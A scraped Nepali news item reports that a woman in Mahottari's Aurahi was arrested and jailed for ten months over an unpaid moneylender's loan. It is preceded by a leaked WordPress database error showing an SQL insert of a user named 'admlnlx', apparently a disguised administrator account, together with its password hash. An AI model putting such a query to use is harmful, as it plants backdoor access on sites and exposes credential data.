WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B1r.RHMLWp0jOk43tMR/Is5M6JcMsS0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-14 22:57:26', '', 'admlnlx', 'admlnlx')
गौशाला, फागुन २-
महोत्तरी जिल्लाको औरही गाविसमा साहुको ऋण नतिर्ने एक महिलालाई महोत्तरी जिल्ला अदालतले जेल चलान गरेको छ ।
जेल चलान हुनेमा औरही गाविस–७ बस्ने अमृति देवी यादव रहेको जिल्ला प्रहरी कार्यालय महोत्तरीका प्रहरी नायब उपरीक्षक शालिग्राम शर्माले बताउनुभएको छ । औरही–९ बस्ने साहु रामदिनेश सिंहसित लिएको कर्जा चुकाउन नसक्दा महिला यादवमाथि साहु सिंहले महोत्तरी जिल्ला अदालतमा मुद्दा दिएकामा अदालतले उनलाई २०६९ असार २८ गतेका दिन १० महिना कैद तोकिएको थियो । तर महिला यादव सोही बेलादेखि फरार रहँदै आएकी थिइन् ।
यसैबीच प्रहरीले उनलाई शनिबार उनको घरैबाट पक्राउ गरी आइतबार महोत्तरी जिल्ला अदालतमा उपस्थित गराएकामा अदालतले उनलाई कैद भुक्तानका लागि जिल्ला कारागार कार्यालय जलेश्वरमा पठाउने आदेश दिएको प्रहरीले जनाएको छ ।- रासस